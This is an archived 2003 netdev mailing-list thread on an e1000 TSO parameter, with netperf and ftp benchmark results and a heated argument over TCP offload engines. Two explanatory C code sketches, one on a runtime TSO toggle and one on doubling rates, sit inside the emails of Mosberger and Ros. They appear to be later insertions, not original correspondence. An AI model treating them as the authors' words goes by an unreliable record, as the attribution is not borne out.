Received: from palrel12.hp.com (palrel12.hp.com [156.153.255.237]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F4v6Fl024761 for ; Mon, 14 Jul 2003 21:57:11 -0700
Received: from hplms2.hpl.hp.com (hplms2.hpl.hp.com [15.0.152.33]) by palrel12.hp.com (Postfix) with ESMTP id 9407B1C00C78; Mon, 14 Jul 2003 21:57:06 -0700 (PDT)
Received: from napali.hpl.hp.com (napali.hpl.hp.com [15.4.89.123]) by hplms2.hpl.hp.com (8.12.9/8.12.9/HPL-PA Hub) with ESMTP id h6F4v51A008719; Mon, 14 Jul 2003 21:57:06 -0700 (PDT)
Received: from napali.hpl.hp.com (localhost [127.0.0.1]) by napali.hpl.hp.com (8.12.3/8.12.3/Debian-5) with ESMTP id h6F4v5rK026648; Mon, 14 Jul 2003 21:57:05 -0700
Received: (from davidm@localhost) by napali.hpl.hp.com (8.12.3/8.12.3/Debian-5) id h6F4v5Mk026644; Mon, 14 Jul 2003 21:57:05 -0700
From: David Mosberger
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <16147.35233.333351.492981@napali.hpl.hp.com>
Date: Mon, 14 Jul 2003 21:57:05 -0700
To: "David S. Miller"
Cc: "Feldman, Scott" , davidm@hpl.hp.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com
Subject: Re: [patch] e1000 TSO parameter
In-Reply-To: <20030714214510.17e02a9f.davem@redhat.com>
References: <20030714214510.17e02a9f.davem@redhat.com>
X-Mailer: VM 7.07 under Emacs 21.2.1
Reply-To: davidm@hpl.hp.com
X-URL: http://www.hpl.hp.com/personal/David_Mosberger/
X-archive-position: 4038
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: davidm@napali.hpl.hp.com
Precedence: bulk
X-list: netdev

>>>>> On Mon, 14 Jul 2003 21:45:10 -0700, "David S. Miller" said:

  DaveM> On Mon, 14 Jul 2003 21:42:40 -0700 "Feldman, Scott" wrote:

  >> > Note that I had to move the e1000_check_options() call to a
  >> > slightly earlier place.  You may want to double-check that
  >> > it's really OK.

  >> I'm not too keen on adding another module parameter.  Maybe a
  >> CONFIG_E1000_TSO option?

  DaveM> Extend ethtool please :-)

ethtool would be ideal, agreed.  I absolutely think that this should
be a runtime option, not a compile-time option.
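
To make the runtime-versus-compile-time distinction concrete, here is a
minimal userspace sketch. It is not the e1000 driver's code: the
demo_* names and the feature-bit values are hypothetical, and the
tso_capable field merely stands in for the mac_type checks in the patch
quoted earlier. It only illustrates gating the TSO feature bit on a flag
that can be flipped while the system is running.

```c
#include <assert.h>
#include <stddef.h>

/* Illustrative feature bits; the values are placeholders, not the
 * kernel's NETIF_F_* definitions. */
#define DEMO_F_SG  0x1u
#define DEMO_F_TSO 0x2u

/* Hypothetical stand-in for the driver's per-adapter state. */
struct demo_adapter {
	int tso_capable;  /* hardware can do TSO (mac_type checks in the patch) */
	int tso_enabled;  /* runtime switch, e.g. set by an ethtool-style request */
};

/* Compute the advertised features: TSO only if capable AND enabled. */
unsigned demo_features(const struct demo_adapter *a)
{
	unsigned features = DEMO_F_SG;

	assert(a != NULL);
	if (a->tso_capable && a->tso_enabled)
		features |= DEMO_F_TSO;
	return features;
}

/* Runtime toggle: flip the flag and recompute, with no rebuild or reload. */
unsigned demo_set_tso(struct demo_adapter *a, int on)
{
	assert(a != NULL);
	a->tso_enabled = on ? 1 : 0;
	return demo_features(a);
}
```

With a compile-time option the equivalent of tso_enabled would be fixed
by an #ifdef when the kernel is built; with a runtime switch, the same
binary can be flipped back and forth between benchmark runs.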

	--david

From scott.feldman@intel.com Mon Jul 14 22:11:49 2003
Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 22:11:53 -0700 (PDT)
Received: from caduceus.jf.intel.com (fmr06.intel.com [134.134.136.7]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F5BmFl025392 for ; Mon, 14 Jul 2003 22:11:49 -0700
Received: from petasus.jf.intel.com (petasus.jf.intel.com [10.7.209.6]) by caduceus.jf.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h6F55wj14055 for ; Tue, 15 Jul 2003 05:05:58 GMT
Received: from orsmsxvs040.jf.intel.com (orsmsxvs040.jf.intel.com [192.168.65.206]) by petasus.jf.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h6F56tU25007 for ; Tue, 15 Jul 2003 05:06:55 GMT
Received: from orsmsx331.amr.corp.intel.com ([192.168.65.56]) by orsmsxvs040.jf.intel.com (NAVGW 2.5.2.11) with SMTP id M2003071422231301619 ; Mon, 14 Jul 2003 22:23:13 -0700
Received: from orsmsx402.amr.corp.intel.com ([192.168.65.208]) by orsmsx331.amr.corp.intel.com with Microsoft SMTPSVC(5.0.2195.5329); Mon, 14 Jul 2003 22:11:42 -0700
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
X-MimeOLE: Produced By Microsoft Exchange V6.0.6375.0
Subject: RE: [patch] e1000 TSO parameter
Date: Mon, 14 Jul 2003 22:11:41 -0700
Message-ID:
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
Thread-Topic: [patch] e1000 TSO parameter
Thread-Index: AcNKjXHm75RxR2SVR1G4lL8VbghgLgAAgskg
From: "Feldman, Scott"
To: "David S. Miller"
Cc: , ,
X-OriginalArrivalTime: 15 Jul 2003 05:11:42.0275 (UTC) FILETIME=[94253130:01C34A8F]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6F5BmFl025392
X-archive-position: 4039
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: scott.feldman@intel.com
Precedence: bulk
X-list: netdev

> Extend ethtool please :-)

Even better.  This should be no problem.

From davidm@napali.hpl.hp.com Mon Jul 14 22:31:02 2003
Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 22:31:37 -0700 (PDT)
Received: from palrel12.hp.com (palrel12.hp.com [156.153.255.237]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F5V2Fl026031 for ; Mon, 14 Jul 2003 22:31:02 -0700
Received: from hplms2.hpl.hp.com (hplms2.hpl.hp.com [15.0.152.33]) by palrel12.hp.com (Postfix) with ESMTP id 29A9C1C018DE; Mon, 14 Jul 2003 22:31:02 -0700 (PDT)
Received: from napali.hpl.hp.com (napali.hpl.hp.com [15.4.89.123]) by hplms2.hpl.hp.com (8.12.9/8.12.9/HPL-PA Hub) with ESMTP id h6F5V11A010476; Mon, 14 Jul 2003 22:31:01 -0700 (PDT)
Received: from napali.hpl.hp.com (localhost [127.0.0.1]) by napali.hpl.hp.com (8.12.3/8.12.3/Debian-5) with ESMTP id h6F5V1rK026972; Mon, 14 Jul 2003 22:31:01 -0700
Received: (from davidm@localhost) by napali.hpl.hp.com (8.12.3/8.12.3/Debian-5) id h6F5V1FU026968; Mon, 14 Jul 2003 22:31:01 -0700
From: David Mosberger
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <16147.37268.946613.965075@napali.hpl.hp.com>
Date: Mon, 14 Jul 2003 22:31:00 -0700
To: "Feldman, Scott"
Cc: davidm@hpl.hp.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com
Subject: Re: [patch] e1000 TSO parameter
In-Reply-To: <20030714214510.17e02a9f.davem@redhat.com>
References: <20030714214510.17e02a9f.davem@redhat.com>
X-Mailer: VM 7.07 under Emacs 21.2.1
Reply-To: davidm@hpl.hp.com
X-URL:
 http://www.hpl.hp.com/personal/David_Mosberger/
X-archive-position: 4040
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: davidm@napali.hpl.hp.com
Precedence: bulk
X-list: netdev

[Scott, somehow I never received your original response so I'm
 replying based on what I saw in the linux.kernel newsgroup...]

  Scott> Do you have any data to share?

Sure, I don't see why not.  Here are the numbers I got:

TSO disabled:

$ modprobe e1000 InterruptThrottleRate=0,0,0,0 TSO=0,0,0,0
$ netperf -l 30 -c -C -H foobar -- -s64K -S64K
TCP STREAM TEST to foobar
Recv   Send    Send                          Utilization       Service Demand
Socket Socket  Message  Elapsed              Send     Recv     Send    Recv
Size   Size    Size     Time     Throughput  local    remote   local   remote
bytes  bytes   bytes    secs.    10^6bits/s  % S      % S      us/KB   us/KB

131070 131072 131072    30.00       897.16   34.07    35.00    3.111   3.196

TSO enabled:

$ modprobe e1000 InterruptThrottleRate=0,0,0,0 TSO=1,1,1,1
$ netperf -l 30 -c -C -H foobar -- -s64K -S64K
TCP STREAM TEST to foobar
Recv   Send    Send                          Utilization       Service Demand
Socket Socket  Message  Elapsed              Send     Recv     Send    Recv
Size   Size    Size     Time     Throughput  local    remote   local   remote
bytes  bytes   bytes    secs.    10^6bits/s  % S      % S      us/KB   us/KB

131070 131072 131072    30.00       894.09   11.65    34.48    1.068   3.159

This looks roughly like you'd expect: with TSO, slightly lower
throughput but much less CPU overhead.

With ftp, things get stranger: fetching a 2GByte file via ftp get
(from the remote end):

TSO disabled:

ftp> get big.iso /dev/null
local: /dev/null remote: big.iso
200 PORT command successful.
150 Opening BINARY mode data connection for 'big.iso' (2038628352 bytes).
226 Transfer complete.
2038628352 bytes received in 18.17 secs (109554.5 kB/s)

ftp server CPU utilization: ~ 40%

With TSO enabled:

ftp> get big.iso /dev/null
local: /dev/null remote: big.iso
200 PORT command successful.
150 Opening BINARY mode data connection for 'big.iso' (2038628352 bytes).
226 Transfer complete.
2038628352 bytes received in 21.16 secs (94070.2 kB/s)

ftp server CPU utilization: ~ 15%

So we get a throughput drop of almost 15% (109554.5 kB/s down to
94070.2 kB/s).  This was with plain "netkit ftpd".  AFAIK, it does a
simple read/write loop (not sendfile()).

	--david

From jros@xiran.com Mon Jul 14 22:44:05 2003
Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 22:44:25 -0700 (PDT)
Received: from xout2-dmz.simpletech.com (xout2.simpletech.com [208.178.183.22]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F5i5Fl026577 for ; Mon, 14 Jul 2003 22:44:05 -0700
Received: from mail pickup service by xout2-dmz.simpletech.com with Microsoft SMTPSVC; Mon, 14 Jul 2003 22:42:56 -0700
Received: from STXCHG1.simpletech.com ([172.16.0.145]) by xout2-dmz.simpletech.com with Microsoft SMTPSVC(5.0.2195.5329); Mon, 14 Jul 2003 22:42:55 -0700
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Content-Class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C34A93.F094F44C"
Subject: RE: TCP IP Offloading Interface
Date: Mon, 14 Jul 2003 22:42:55 -0700
Message-ID:
X-MS-Has-Attach:
X-MS-TNEF-Correlator:
Thread-Topic: RE: TCP IP Offloading Interface
thread-index: AcNKk/ABXvjlRUczR9KtMKhS3c7zQQ==
From: "Jordi Ros"
To: , , , ,
X-OriginalArrivalTime: 15 Jul 2003 05:42:55.0632 (UTC) FILETIME=[F0C0C900:01C34A93]
X-archive-position: 4041
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: jros@xiran.com
Precedence: bulk
X-list: netdev

This is a multi-part message in MIME format.

------_=_NextPart_001_01C34A93.F094F44C
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: quoted-printable

David,

TCP offloading does not necessarily need to be the goal, but it is a
MUST if one wants to build a performance-scalable architecture. This
vision is in fact introduced by Mogul in his paper.
He writes: "Therefore, offloading the transport layer becomes valuable
not for its own sake, but rather because that allows offloading of the
RDMA [...]".

> TOE is evil, read this:
> http://www.usenix.org/events/hotos03/tech/full_papers/mogul/mogul.pdf
> TOE is exactly suboptimal for the very things performance
> matters, high connection rates.

It is important to understand as well that, as Mogul presents it, RDMA
is just one good example, but not the only one. Note that you can
replace the word RDMA in Mogul's quote with either of the following two
terms and the same argument still applies: Encryption and Direct Path.

1) Encryption: Apostolopoulos et al ("Securing Electronic Commerce:
Reducing the SSL Overhead," IEEE Network Magazine, July/August 2000)
proved that overheads due to software encryption can make the servers
slower by two orders of magnitude. Because SSL runs on top of the
transport protocol, if you want to do SSL in HW then you are better off
having the transport offloaded and embedding your SSL ASIC on the board
(this is exactly the same argument that Mogul presents for the case of
RDMA). Assuming an encryption ASIC that can run at wire speed, this
would mean a performance improvement of about 100 times, not just 2 or
3 times.

2) Direct Path (tm) from network to storage. The current architecture
requires a complete round trip through kernel and user space in order
to retrieve data from the storage and push it back out to the network.
The router guys already know what it is to design an architecture based
on the separation of control plane and data plane. Now, does today's
server architecture do any such separation? The answer is no. Such a
separation is what Xiran Labs (www.xiran.com) has designed. The server
is accelerated by providing a Direct Path from storage to network (data
plane) using an ASIC board that has: (1) network interface + (2)
storage interface + (3) PCI interface + (4) intelligence. The control
plane runs on the host side and interfaces with the board through the
PCI interface. The data plane runs in the direct path on the ASIC
board, completely bypassing the host. All the data is transported with
zero copy, directly from storage to network, using ASIC engines that
perform optimized tasks (such as TCP segmentation or checksumming,
among others). There are no interrupts to the host. The efficiency, in
terms of bits per cycle, is today 6 times superior compared to current
architecture (see
www.ipv6-es.com/03/documents/xiran/xiran_ipv6_paper.pdf). As an
example, there are two well defined applications for Direct Path: video
streaming and iSCSI. They are well defined because both require the
transport of massive amounts of data (data plane). In both cases one
can show a significant improvement in performance.

TOE is believed not to improve performance. I may agree that TOE by
itself may not, but TOE as a means to deliver some other technology
(e.g. RDMA, encryption or Direct Path) does improve the overall
performance, in some instances dramatically. Let me show you the
numbers for our Direct Path technology.

We have partnered with Real Networks to build the concept of control
plane and data plane separation into their Helix platform. The system
in fact runs on a Red Hat Linux box. The data plane (RTP) runs on the
Direct Path board and completely bypasses the host (whether it is UDP
based or TCP, the data plane connections are routed through the board
directly to storage). The control plane (RTCP) runs on the host (the
TCP connection is routed to the host). While a Linux box that uses a
regular NIC can deliver 300 Mbps of video streaming out of storage at
90% host CPU utilization, replacing the regular NIC in the same system
with a Direct Path board gives 600 Mbps with only 3% host CPU
utilization. The reason is that the direct path is completely zero
copy, and it provides HW-accelerated functions. As for scalability, by
using 'n' Direct Path boards in the same system, you get n times the
throughput and a utilization of n*3% at the host CPU side, because the
system can scale (each Direct Path board is physically isolated from
the others). This technology has been presented at several conferences
and is in alpha phase as we speak.

Note that Microsoft is considering TOE under its Scalable Networking
Program. To keep Linux competitive, I would encourage a healthy
discussion on this matter. Again, TOE is not the goal but the means to
deliver important technologies for the next generation of servers. This
will be critical as the backbone of the Internet goes to all-optical
networks while the servers stay in the electronic domain. As shown by
McKeown, "Circuit Switching in the Core", the line capacity of optical
fibers is doubling every 7 months while CPU processing capacity
(Moore's law) can only double every 18 months.

jordi


-----Original Message-----
From: linux-net-owner@vger.kernel.org
[mailto:linux-net-owner@vger.kernel.org]On Behalf Of David S. Miller
Sent: Sunday, July 13, 2003 12:48 AM
To: Alan Shih
Cc: linux-kernel@vger.kernel.org; linux-net@vger.kernel.org;
netdev@oss.sgi.com
Subject: Re: TCP IP Offloading Interface


Your return is also absolutely questionable.  Servers "serve" data
and we offload all of the send side TCP processing that can
reasonably be done (segmentation, checksumming).

I've never seen an impartial benchmark showing that TCP send
side performance goes up as a result of using TOE vs. the usual
segmentation + checksum offloading offered today.

On receive side, clever RX buffer flipping tricks are the way
to go and require no protocol changes and nothing gross like
TOE or weird buffer ownership protocols like RDMA requires.

I've made postings showing how such a scheme can work using a limited
flow cache on the networking card.  I don't have a reference handy,
but I suppose someone else does.

And finally, this discussion belongs on the "networking" lists.
Nearly all of the "networking" developers don't have time to sift
through linux-kernel every day.
-
To unsubscribe from this list: send the line "unsubscribe linux-net" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


PROPRIETARY-CONFIDENTIAL INFORMATION INCLUDED

This electronic transmission, and any documents attached hereto, may
contain confidential, proprietary and/or legally privileged
information. The information is intended only for use by the recipient
named above. If you received this electronic message in error, please
notify the sender and delete the electronic message. Any disclosure,
copying, distribution, or use of the contents of information received
in error is strictly prohibited, and violators will be pursued legally.

------_=_NextPart_001_01C34A93.F094F44C
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: quoted-printable
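
As a rough check of the growth-rate comparison near the end of the
message above (line capacity doubling every 7 months, CPU capacity
every 18 months), the following sketch counts whole doublings over a
given number of months. The function names are illustrative only, and
the 126-month horizon is chosen simply because it is the least common
multiple of 7 and 18, so both doubling counts come out as integers.

```c
#include <assert.h>

/* Whole doublings that fit into `months`, at one doubling per `period` months. */
unsigned doublings(unsigned months, unsigned period)
{
	assert(period > 0);
	return months / period;
}

/* Factor by which link capacity outgrows CPU capacity after `months`.
 * Assumes the link doubles at least as often as the CPU (link_period <=
 * cpu_period) and that the difference in doublings is below 64. */
unsigned long long gap_factor(unsigned months, unsigned link_period,
			      unsigned cpu_period)
{
	unsigned link = doublings(months, link_period);
	unsigned cpu = doublings(months, cpu_period);

	assert(link >= cpu && link - cpu < 64);
	return 1ULL << (link - cpu);
}
```

Under those stated doubling periods, over 126 months the link doubles 18
times and the CPU 7 times, so gap_factor(126, 7, 18) is 2^11 = 2048.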
=0A=

David,

=0A=

TCP offloading does not necessarily need to be the goal but a MUST if = one =0A= wants to build a performance-scalable architecture. This vision is in = fact =0A= introduced by Mogul in his paper. He writes: "Therefore, offloading the =0A= transport layer becomes valuable not for its own sake, but rather = because that =0A= allows offloading of the RDMA [...]".

=0A=

> TOE is evil, read this:

=0A=

> =0A= http://www.usenix.org/events/hotos03/tech/full_papers/mogul/mogul.pdf

=0A=

> TOE is exactly suboptimal for the very things performance

=0A=

> matters, high connection rates.

=0A=

It is important to understand as well that as Mogul presents, RDMA is = just =0A= one good example, but not the only one. Note that you can change the = word RDMA =0A= in Mogul's quote by the following two words and still the same argument = applies: =0A= Encryption and Direct Path.

=0A=

1) Encryption: Apostolopoulos et al ("Securing Electronic Commerce: = Reducing =0A= the SSL Overhead," IEEE Network Magazine, July/August 2000) proved that =0A= overheads due to software encryption can make the servers slower by two = orders =0A= of magnitude. Because SSL runs on top of the transport protocol, if you = want to =0A= do SSL in HW then you are better off having the transport offloaded and =0A= embedding your SSL asic on the board (this is exactly the same argument = that =0A= Mogul presents on the case of RDMA). Assuming an encryption asic that = can run at =0A= wire speed, this would mean about 100 times performance improvement, not = just 2 =0A= or 3 times.

=0A=

2) Direct Path (tm) from network to storage. Current architecture = requires a =0A= complete round trip to the kernel-user space in order to retrieve data = from the =0A= storage and dump it back to the network. The router guys already know = what it is =0A= to design an architecture based on the separation of control plane and = data =0A= plane. Now, does today's server architecture do any separation? the = answer is =0A= no. This is what Xiran Labs (www.xiran.com) has designed. The server is =0A= accelerated by providing a Direct Path from storage to network (data = plane) =0A= using an asic board that has: (1) network interface + (2) storage = interface + =0A= (3) PCI interface + (4) intelligence. The control plane runs at the host = side =0A= and interfaces with the board through the pci interface. The data plane = runs in =0A= the direct path on the asic board completely bypassing the host. All the = data is =0A= transported in zero copy, directly from storage to network, using asic = engines =0A= that perform optimized tasks (such as tcp segmentation or checksumming, = among =0A= others). There is no interrupts to the host. The efficiency, in terms of = bits =0A= per cycle, is today 6 times superior compared to current architecture = (see =0A= www.ipv6-es.com/03/documents/xiran/xiran_ipv6_paper.pdf). As an example, = there =0A= are two well defined applications for Direct Path. Video streaming and = ISCSI. =0A= The reason why they are well defined is because both require the = transport of =0A= massive amount of data (data plane). In both cases one can show an = important =0A= improve in performance.

=0A=

TOE is believed to not provide performance. I may agree that TOE by = itself =0A= may not, but TOE as a means to deliver some other technology (e.g. RDMA, =0A= encryption or Direct Path) it does optimize (in some instance = dramatically) the =0A= overall performance. Let me show you the numbers in our Direct Path = technology. =0A=

=0A=

We have partnered with Real Networks to build the concept of control = plane =0A= and data plane separation in their Helix platform. The system in fact = runs on a =0A= Redhat linux box. The data plane (RTP) runs on the Direct Path board and =0A= completely bypasses the host (whether it is udp based or tcp, the data = plane =0A= connections are routed through the board directly to storage). The = control plane =0A= (RTCP) runs on the host (the tcp connection is routed to the host). = While a =0A= Linux box that uses a regular nic card can deliver 300 Mbps of video = streaming =0A= out of storage at 90% CPU host utilization, by changing in the same = system the =0A= regular nic card with a Direct Path board we can get 600 Mbps with only = 3% CPU =0A= host utilization. The reason is because the direct path is completely = zero copy, =0A= and it provides hw accelerated functions. As for scalability, by using = 'n' =0A= direct path boards in the same system, you get n times the throughput = and a =0A= utilization of n*3% at the host CPU side because the system can scale = (since =0A= each direct path board is physically isolated from each other). This = technology =0A= has been presented in several conferences and is in alpha phase as we = speak.


Note that Microsoft is considering TOE under its Scalable Networking Program. To keep linux competitive, I would encourage a healthy discussion on this matter. Again, TOE is not the goal but the means to deliver important technologies for the next generation of servers. This will be critical as the backbone of the Internet goes to all optical networks while the servers stay in the electronic domain. As shown by McKeown, "Circuit Switching in the Core", the line capacity of the optical fibers is doubling every 7 months while the processing CPU capacity (Moore's law) can only double every 18 months.
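
To make the two doubling periods concrete, here is a small sketch that counts whole doublings over a time span and reports the resulting gap as a power of two. The function names are hypothetical, and the 7 and 18 month periods are simply the ones quoted above.

```c
#include <assert.h>

/* Whole doublings that fit into `months` for a given doubling period. */
static unsigned doublings(unsigned months, unsigned period_months)
{
    assert(period_months > 0);
    return months / period_months;
}

/* log2 of (line capacity growth / CPU growth) after `months`,
 * using the quoted periods of 7 and 18 months. */
static unsigned gap_log2(unsigned months)
{
    return doublings(months, 7) - doublings(months, 18);
}

/* The same gap expressed as a plain factor. */
static unsigned long gap_factor(unsigned months)
{
    unsigned e = gap_log2(months);
    assert(e < 8 * sizeof(unsigned long));
    return 1UL << e;
}
```

Over 126 months (the least common multiple of 7 and 18) line capacity would double 18 times and CPU capacity 7 times, so the gap would be 2^11 = 2048 if both trends held.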


jordi


-----Original Message-----
From: linux-net-owner@vger.kernel.org
[mailto:linux-net-owner@vger.kernel.org]On Behalf Of David S. Miller
Sent: Sunday, July 13, 2003 12:48 AM
To: Alan Shih
Cc: linux-kernel@vger.kernel.org; linux-net@vger.kernel.org;
netdev@oss.sgi.com
Subject: Re: TCP IP Offloading Interface

Your return is also absolutely questionable. Servers "serve" data
and we offload all of the send side TCP processing that can
reasonably be done (segmentation, checksumming).
I've never seen an impartial benchmark showing that TCP send
side performance goes up as a result of using TOE vs. the usual
segmentation + checksum offloading offered today.
On receive side, clever RX buffer flipping tricks are the way
to go and require no protocol changes and nothing gross like
TOE or weird buffer ownership protocols like RDMA requires.
I've made postings showing how such a scheme can work using a limited
flow cache on the networking card. I don't have a reference handy,
but I suppose someone else does.
And finally, this discussion belongs on the "networking" lists.
Nearly all of the "networking" developers don't have time to sift
through linux-kernel every day.
-
To unsubscribe from this list: send the line "unsubscribe linux-net" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at http://vger.kernel.org/majordomo-info.html


PROPRIETARY-CONFIDENTIAL INFORMATION INCLUDED

This electronic transmission, and any documents attached hereto, may contain confidential, proprietary and/or legally privileged information. The information is intended only for use by the recipient named above. If you received this electronic message in error, please notify the sender and delete the electronic message. Any disclosure, copying, distribution, or use of the contents of information received in error is strictly prohibited, and violators will be pursued legally.

------_=_NextPart_001_01C34A93.F094F44C--

From davem@redhat.com Mon Jul 14 22:48:43 2003
Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 22:48:47 -0700 (PDT)
Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F5mhFl026957 for ; Mon, 14 Jul 2003 22:48:43 -0700
Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id WAA12791; Mon, 14 Jul 2003 22:38:23 -0700
Date: Mon, 14 Jul 2003 22:38:22 -0700
From: "David S. Miller"
To: davidm@hpl.hp.com
Cc: davidm@napali.hpl.hp.com, scott.feldman@intel.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com
Subject: Re: [patch] e1000 TSO parameter
Message-Id: <20030714223822.23b78f9b.davem@redhat.com>
In-Reply-To: <16147.37268.946613.965075@napali.hpl.hp.com>
References: <20030714214510.17e02a9f.davem@redhat.com> <16147.37268.946613.965075@napali.hpl.hp.com>
X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
X-archive-position: 4042
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: davem@redhat.com
Precedence: bulk
X-list: netdev

On Mon, 14 Jul 2003 22:31:00 -0700
David Mosberger wrote:

> With TSO enabled:
>
> ftp> get big.iso /dev/null
> local: /dev/null remote: big.iso
> 200 PORT command successful.
> 150 Opening BINARY mode data connection for 'big.iso' (2038628352 bytes).
> 226 Transfer complete.
> 2038628352 bytes received in 21.16 secs (94070.2 kB/s)
>
> ftp server CPU utilization: ~ 15%
>
> So we get almost 15% of throughput drop. This was with plain "netkit
> fptd". AFAIK, it does a simple read/write loop (not sendfile()).

When we use TSO for non-sendfile() applications it really stresses memory allocations. We do these 64K+ kmalloc()'s for each packet we construct.
But I don't think that's what is happening here, rather the PCI controller is "talking" to the CPU's L2 cache with coherency transactions on all the data of every packet going to the chip.

Whereas with a sendfile() type setup, the PCI controller is going straight to main memory for the data part of the packets since the CPU is unlikely to have each page cache page in its L2 caches.

In the sendmsg() case, it's virtually guaranteed that the cpu will have all the packet data in its L2 cache in an unshared-modified state.

I know how this can be fixed, can you use L2-bypassing stores in your csum_and_copy_from_user() and copy_from_user() implementations like we do on sparc64? That would exactly eliminate this situation where the card is talking to the cpu's L2 cache for all the data during the PCI DMA transaction on the send side.

From davem@redhat.com Mon Jul 14 23:00:49 2003
Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 23:00:59 -0700 (PDT)
Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6F60mFl029015 for ; Mon, 14 Jul 2003 23:00:49 -0700
Received: from pizda.ninka.net (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with SMTP id WAA12813; Mon, 14 Jul 2003 22:51:33 -0700
Date: Mon, 14 Jul 2003 22:51:33 -0700
From: "David S. Miller"
To: "Jordi Ros"
Cc: linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com, alan@storlinksemi.com
Subject: Re: TCP IP Offloading Interface
Message-Id: <20030714225133.18395b69.davem@redhat.com>
In-Reply-To:
References:
X-Mailer: Sylpheed version 0.9.2 (GTK+ 1.2.6; sparc-unknown-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
X-archive-position: 4043
X-ecartis-version: Ecartis v1.0.0
Sender: netdev-bounce@oss.sgi.com
Errors-to: netdev-bounce@oss.sgi.com
X-original-sender: davem@redhat.com
Precedence: bulk
X-list: netdev

On Mon, 14 Jul 2003 22:42:55 -0700
"Jordi Ros" wrote:

[ Please fix Outlook Express or whatever lame email client you use to put newlines into the emails that you compose. These excessively long lines make your emails nearly impossible to read ]

> TCP offloading does not necessarily need to be the goal but a MUST
> if one wants to build a performance-scalable architecture. This
> vision is in fact introduced by Mogul in his paper. He writes:
> "Therefore, offloading the transport layer becomes valuable not for
> its own sake, but rather because that allows offloading of the RDMA
> [...]".

I totally disagree. It is not a MUST, in fact I have described an alternative implementation that requires none of the complexity of RDMA, and none of the stupidity of TOE.

Read my lips: "We do not need to offload TCP itself to get the attributes you desire, therefore we are NOT going to do it."

You can choose to ignore my suggestions and likewise I will continue to ignore the endless (and frankly, boring after reading it for the 100th time) spouting from people like you that we somehow "NEED" or "MUST" have TOE, which is complete bullshit as exemplified by my alternative example scheme.

You also ignore the points others have made that the systems HAVE SCALED to evolving network technologies as they have become faster and faster.
And when you ignore me, don't be surprised when other companies come along, implement my scheme, it gets supported in Linux and subsequently the stock of your company effectively becomes toilet paper and TOE is an obscure piece of computing history gone wrong :-) > TOE is believed to not provide performance. I may agree that TOE by > itself may not, but TOE as a means to deliver some other technology > (e.g. RDMA, encryption or Direct Path) it does optimize (in some > instance dramatically) the overall performance. Let me show you the > numbers in our Direct Path technology. But our point is that you don't need any of this crap. My RX receive page accumulation scheme handles all of the receive side problems with touching the data and getting into the filesystem and then the device. With my scheme you can receive the data, go direct to the device, and the cpu never touches one byte. > Note that Microsoft is considering TOE under its Scalable Networking > Program. To keep linux competitive, I would encourage a healthy > discussion on this matter I actually welcome Microsoft falling into this rathole of a technology. Let them have to support that crap and have to field bug reports on it, having to wonder who created the packets. And let them deal with the negative effects TOE has on connection rates and things like that. Linux will be competitive, especially if people develop the scheme I have described several times into the hardware. There are vendors doing this, will you choose to be different and ignore this? 
